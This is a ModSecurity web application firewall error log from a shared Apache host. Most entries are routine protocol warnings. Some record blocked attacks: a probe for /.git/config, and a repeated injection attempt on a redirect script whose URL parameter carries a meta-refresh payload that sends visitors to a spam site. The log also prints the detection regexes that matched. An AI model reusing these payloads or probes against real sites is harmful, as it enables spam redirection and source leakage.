[Mon May 11 19:58:32.083513 2026] [security2:error] [pid 1516058:tid 1516104] [client 43.156.168.214:53036] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "apoe.fr"] [uri "/mentions.html"] [unique_id "agIYyCMeXtzav-mi9SydUAAAAM4"]
[Mon May 11 19:58:44.865439 2026] [security2:error] [pid 1501831:tid 1501839] [client 43.157.38.131:49512] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "rentparadise.fr"] [uri "/accommodation/mobil-home-hawai/"] [unique_id "agIY1FNddpkriGUb6ZVi_QAAAQY"]
[Mon May 11 19:58:45.617382 2026] [security2:error] [pid 1534836:tid 1534891] [client 43.128.69.143:52340] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "of-crystal-lake.net"] [uri "/index.php"] [unique_id "agIY1deaRXe5lR8y0ZOAhAAAAVQ"]
[Mon May 11 19:58:45.617901 2026] [:error] [pid 1534836:tid 1534891] [client 43.128.69.143:52340] File does not exist: /home/ofcrysta/public_html/index.php
[Mon May 11 19:59:36.334203 2026] [security2:error] [pid 1502013:tid 1502036] [client 43.134.33.236:54494] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "letamsgarage.fr"] [uri "/"] [unique_id "agIZCJYn-x0CHsbEbP2Z0QAAAIc"]
[Mon May 11 19:59:47.574016 2026] [security2:error] [pid 1534836:tid 1534889] [client 43.156.116.44:40082] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.jeanboyault.fr"] [uri "/simple-ronde/"] [unique_id "agIZE9eaRXe5lR8y0ZOAxgAAAVI"]
[Mon May 11 19:59:52.204913 2026] [security2:error] [pid 1502013:tid 1502040] [client 43.159.136.201:39734] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIZGJYn-x0CHsbEbP2Z2wAAAI0"]
[Mon May 11 20:00:56.100391 2026] [security2:error] [pid 1511173:tid 1511194] [client 101.33.66.34:48296] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.tchatbooster.com"] [uri "/"] [unique_id "agIZWPjVc-A-CSptvm1gIAAAAFI"], referer: http://tchatbooster.fr
[Mon May 11 20:01:41.853240 2026] [security2:error] [pid 1516058:tid 1516108] [client 43.166.246.180:34540] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "habilis.space"] [uri "/"] [unique_id "agIZhSMeXtzav-mi9SyeTQAAANI"]
[Mon May 11 20:01:44.849829 2026] [security2:error] [pid 1511173:tid 1511185] [client 43.166.246.180:37902] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "habilis.space"] [uri "/cgi-sys/suspendedpage.cgi"] [unique_id "agIZiPjVc-A-CSptvm1gRQAAAEk"], referer: http://habilis.space
[Mon May 11 20:02:19.443134 2026] [security2:error] [pid 1534836:tid 1534886] [client 136.107.24.183:33770] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "naturedetres.fr"] [uri "/.git/config"] [unique_id "agIZq9eaRXe5lR8y0ZOBqgAAAU8"]
[Mon May 11 20:02:19.443575 2026] [security2:error] [pid 1534836:tid 1534886] [client 136.107.24.183:33770] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "naturedetres.fr"] [uri "/.git/config"] [unique_id "agIZq9eaRXe5lR8y0ZOBqgAAAU8"]
[Mon May 11 20:02:19.443841 2026] [security2:error] [pid 1534836:tid 1534886] [client 136.107.24.183:33770] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "naturedetres.fr"] [uri "/403.shtml"] [unique_id "agIZq9eaRXe5lR8y0ZOBqgAAAU8"]
[Mon May 11 20:02:38.843346 2026] [security2:error] [pid 1501883:tid 1501903] [client 43.130.102.223:49482] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.moncampingcarenligne.com"] [uri "/"] [unique_id "agIZvjP5Q_-MBliRCAxVhAAAABI"]
[Mon May 11 20:03:12.521911 2026] [security2:error] [pid 1534836:tid 1534876] [client 43.130.34.74:49370] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "pole-de-mobilite-regional.com"] [uri "/vous-etes-une-entreprise/offres-de-missions/"] [unique_id "agIZ4NeaRXe5lR8y0ZOCPAAAAUU"]
[Mon May 11 20:04:15.657802 2026] [security2:error] [pid 1501883:tid 1501885] [client 43.163.85.226:41080] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "tct-telecom.fr"] [uri "/wp-login.php"] [unique_id "agIaHzP5Q_-MBliRCAxV5AAAAAA"]
[Mon May 11 20:04:22.925686 2026] [security2:error] [pid 1534836:tid 1534887] [client 43.156.50.197:57494] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.castiglionecorporatefinance.fr"] [uri "/nos-services/conseil-accompagnement/"] [unique_id "agIaJteaRXe5lR8y0ZOChAAAAVA"]
[Mon May 11 20:04:51.658713 2026] [:error] [pid 1516058:tid 1516113] [client 143.198.88.48:59550] File does not exist: /home/sierraim/public_html/wp-login.php
[Mon May 11 20:04:51.962732 2026] [security2:error] [pid 1511173:tid 1511191] [client 27.78.84.116:60257] ModSecurity: Warning. Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-921-PROTOCOL-ATTACK.conf"] [line "65"] [id "921130"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: <meta found within ARGS:url: http://www.www.www.kepenktrsfcdhf.hfhjf.hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>simple evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIaQ_jVc-A-CSptvm1hLAAAAE8"]
[Mon May 11 20:04:51.966838 2026] [security2:error] [pid 1511173:tid 1511191] [client 27.78.84.116:60257] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: http://www.www.Www.KepenkTrsfcdhf.Hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Simple evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ /> found within ARGS:url: http://www.www.Www.KepenkTrsfcdhf.Hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Simple eveni..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIaQ_jVc-A-CSptvm1hLAAAAE8"]
[Mon May 11 20:04:51.967015 2026] [security2:error] [pid 1511173:tid 1511191] [client 27.78.84.116:60257] ModSecurity: Warning. Pattern match "(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "65"] [id "941140"] [rev "3"] [msg "XSS Filter - Category 4: Javascript URI Vector"] [data "Matched Data: <meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ /> found within ARGS:url: http://www.www.Www.KepenkTrsfcdhf.Hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Simple evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_AT [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIaQ_jVc-A-CSptvm1hLAAAAE8"]
[Mon May 11 20:04:51.967446 2026] [security2:error] [pid 1511173:tid 1511191] [client 27.78.84.116:60257] ModSecurity: Warning. Pattern match "(?i)<[^\\\\w<>]*(?:[^<>\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "74"] [id "941160"] [rev "2"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <meta  found within ARGS:url: http://www.www.Www.KepenkTrsfcdhf.Hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Simple evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIaQ_jVc-A-CSptvm1hLAAAAE8"]
[Mon May 11 20:04:51.968268 2026] [security2:error] [pid 1511173:tid 1511191] [client 27.78.84.116:60257] ModSecurity: Warning. Pattern match "(?i:<META[\\\\s/+].*?http-equiv[\\\\s/+]*=[\\\\s/+]*[\\"\\\\'`]?(((c|(&#x?0*((67)|(43)|(99)|(63));?)))|((r|(&#x?0*((82)|(52)|(114)|(72));?)))|((s|(&#x?0*((83)|(53)|(115)|(73));?)))))" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "113"] [id "941250"] [rev "3"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: <meta http-equiv=r found within ARGS:url: http://www.www.Www.KepenkTrsfcdhf.Hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Simple evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "8"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIaQ_jVc-A-CSptvm1hLAAAAE8"]
[Mon May 11 20:04:51.968708 2026] [security2:error] [pid 1511173:tid 1511191] [client 27.78.84.116:60257] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIaQ_jVc-A-CSptvm1hLAAAAE8"]
[Mon May 11 20:04:51.968968 2026] [security2:error] [pid 1511173:tid 1511191] [client 27.78.84.116:60257] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=5,SESS=0): IE XSS Filters - Attack Detected."] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIaQ_jVc-A-CSptvm1hLAAAAE8"]
[Mon May 11 20:05:10.961813 2026] [security2:error] [pid 1501831:tid 1501851] [client 27.78.84.116:61017] ModSecurity: Warning. Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-921-PROTOCOL-ATTACK.conf"] [line "65"] [id "921130"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: <meta found within ARGS:url: http://www.www.www.kepenktrsfcdhf.hfhjf.hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>simple evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIaVlNddpkriGUb6ZVmAwAAARI"]
[Mon May 11 20:05:10.965660 2026] [security2:error] [pid 1501831:tid 1501851] [client 27.78.84.116:61017] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: http://www.www.Www.KepenkTrsfcdhf.Hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Simple evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ /> found within ARGS:url: http://www.www.Www.KepenkTrsfcdhf.Hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Simple eveni..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIaVlNddpkriGUb6ZVmAwAAARI"]
[Mon May 11 20:05:10.965843 2026] [security2:error] [pid 1501831:tid 1501851] [client 27.78.84.116:61017] ModSecurity: Warning. Pattern match "(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "65"] [id "941140"] [rev "3"] [msg "XSS Filter - Category 4: Javascript URI Vector"] [data "Matched Data: <meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ /> found within ARGS:url: http://www.www.Www.KepenkTrsfcdhf.Hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Simple evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_AT [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIaVlNddpkriGUb6ZVmAwAAARI"]
[Mon May 11 20:05:10.969763 2026] [security2:error] [pid 1501831:tid 1501851] [client 27.78.84.116:61017] ModSecurity: Warning. Pattern match "(?i)<[^\\\\w<>]*(?:[^<>\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "74"] [id "941160"] [rev "2"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <meta  found within ARGS:url: http://www.www.Www.KepenkTrsfcdhf.Hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Simple evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIaVlNddpkriGUb6ZVmAwAAARI"]
[Mon May 11 20:05:10.978427 2026] [security2:error] [pid 1501831:tid 1501851] [client 27.78.84.116:61017] ModSecurity: Warning. Pattern match "(?i:<META[\\\\s/+].*?http-equiv[\\\\s/+]*=[\\\\s/+]*[\\"\\\\'`]?(((c|(&#x?0*((67)|(43)|(99)|(63));?)))|((r|(&#x?0*((82)|(52)|(114)|(72));?)))|((s|(&#x?0*((83)|(53)|(115)|(73));?)))))" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "113"] [id "941250"] [rev "3"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: <meta http-equiv=r found within ARGS:url: http://www.www.Www.KepenkTrsfcdhf.Hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Simple evening dress models</a><meta http-equiv=refresh 